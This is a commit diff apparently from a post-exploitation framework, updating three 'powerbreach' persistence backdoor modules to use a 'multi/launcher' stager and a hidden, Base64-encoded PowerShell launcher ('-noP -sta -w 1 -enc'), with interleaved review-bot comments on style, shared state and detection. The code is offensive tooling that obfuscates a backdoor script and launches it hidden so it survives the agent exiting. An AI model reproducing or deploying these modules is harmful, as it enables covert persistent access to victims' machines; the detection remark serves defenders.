Fix powerbreach modules

websockets-multiuser
xorrior 2017-09-20 16:27:05 -04:00
parent ee390adc27
commit 55834180d4
3 changed files with 9 additions and 6 deletions


@ -149,7 +149,7 @@ Invoke-DeadUserBackdoor"""
else: else:
# set the listener value for the launcher # set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["launcher"] stager = self.mainMenu.stagers.stagers["multi/launcher"]
stager.options['Listener']['Value'] = listenerName stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False" stager.options['Base64']['Value'] = "False"
@ -188,7 +188,8 @@ Invoke-DeadUserBackdoor"""
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
# transform the backdoor into something launched by powershell.exe # transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting # so it survives the agent exiting
launcher = helpers.powershell_launcher(script) modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ") parts = stagerCode.split(" ")
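Review bot: The new literal `modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "` is added without a comment and is repeated verbatim in the Invoke-EventLogBackdoor and Invoke-ResolverBackdoor sections below. A one-line comment would spell the switches out for a reader, for example `# -noP: no profile, -sta: single-threaded apartment, -w 1: hidden window, -enc: Base64 (UTF-16LE) encoded command`. The string is also load-bearing, because the following `stagerCode.split(" ")` depends on its exact spacing, so one shared constant would stop the three copies drifting apart. From the detection side, the prefix is fixed, so it should appear unchanged in process-creation command-line logging whenever these modules are used. The enclosing function starts and ends outside the hunk.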


@ -123,7 +123,7 @@ Invoke-EventLogBackdoor"""
else: else:
# set the listener value for the launcher # set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["launcher"] stager = self.mainMenu.stagers.stagers["multi/launcher"]
stager.options['Listener']['Value'] = listenerName stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False" stager.options['Base64']['Value'] = "False"
@ -162,7 +162,8 @@ Invoke-EventLogBackdoor"""
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
# transform the backdoor into something launched by powershell.exe # transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting # so it survives the agent exiting
launcher = helpers.powershell_launcher(script) modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ") parts = stagerCode.split(" ")
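Review bot: The lookup `self.mainMenu.stagers.stagers["multi/launcher"]` appears to return a stager object held by mainMenu, and the next two lines overwrite its `Listener` and `Base64` options in place without restoring them. If that object is shared between callers (not visible in this hunk), the values set here carry over into any later use of the same stager, which matters more on a branch named for multi-user support. Saving the previous option values and restoring them after generation, or working on a copy, would avoid that. The same pattern is in the Invoke-DeadUserBackdoor and Invoke-ResolverBackdoor sections. The enclosing block starts and ends outside the hunk.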


@ -136,7 +136,7 @@ Invoke-ResolverBackdoor"""
else: else:
# set the listener value for the launcher # set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["launcher"] stager = self.mainMenu.stagers.stagers["multi/launcher"]
stager.options['Listener']['Value'] = listenerName stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False" stager.options['Base64']['Value'] = "False"
@ -175,7 +175,8 @@ Invoke-ResolverBackdoor"""
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
# transform the backdoor into something launched by powershell.exe # transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting # so it survives the agent exiting
launcher = helpers.powershell_launcher(script) modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ") parts = stagerCode.split(" ")